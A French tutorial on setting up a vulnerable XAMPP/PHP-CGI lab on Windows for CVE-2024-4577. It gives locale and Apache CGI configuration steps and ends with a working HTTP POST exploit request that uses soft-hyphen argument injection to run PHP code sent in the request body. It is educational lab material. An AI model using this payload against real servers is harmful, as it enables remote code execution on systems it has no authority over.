
Créer un lab pour CVE-2024-4577
| CVE | Description | CVSSv3 |
| CVE-2024-4577 | Vulnérabilité d'injection d'arguments PHP-CGI | 9.8 |
"CVE-2024-4577 est une vulnérabilité critique d'injection d'arguments dans PHP qui peut être exploitée pour exécuter du code à distance (RCE). Selon les chercheurs de DEVCORE, cette faille résulte d'erreurs dans les conversions d'encodage de caractères, affectant la fonctionnalité « Best Fit » sous Windows." -
Téléchargez XAMPP (8.1.25 / PHP 8.1.25) Après avoir installé XAMPP, vérifiez la version de PHP. Elle doit être 8.1.25. La version de PHP peut être vérifiée en exécutant la commande "php -v" depuis la ligne de commande. Si cela génère une erreur, PHP doit être ajouté à la variable PATH.
La locale doit être modifiée. Pour ce faire, suivez : Panneau de configuration > Horloge et région > Région. Définissez le format sur Japonais, Chinois traditionnel ou Chinois simplifié. Cliquez sur Administration > Modifier les paramètres régionaux système et sélectionnez la locale appropriée.
Si PHP ne s'exécute pas en mode cgi, vous devez effectuer ces réglages.
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php
<Directory "C:/xampp/php">
Options +ExecCGI
AllowOverride None
Require all granted
</Directory>
LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Mettez '#' au début de la ligne.Enregistrez les modifications et démarrez l'instance Apache.
Si le résultat du code PHP envoyé dans le corps de la requête POST ci-dessous est visible dans la réponse, l'étape d'exploitation est réussie.
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
echo "vulnerable";
?>
Cet environnement de laboratoire est destiné uniquement à des fins éducatives et ne doit pas être utilisé dans des environnements réels. Je ne suis pas responsable des dommages ou pertes qui pourraient survenir suite à une utilisation inappropriée. Les utilisateurs doivent utiliser cet environnement à leurs propres risques.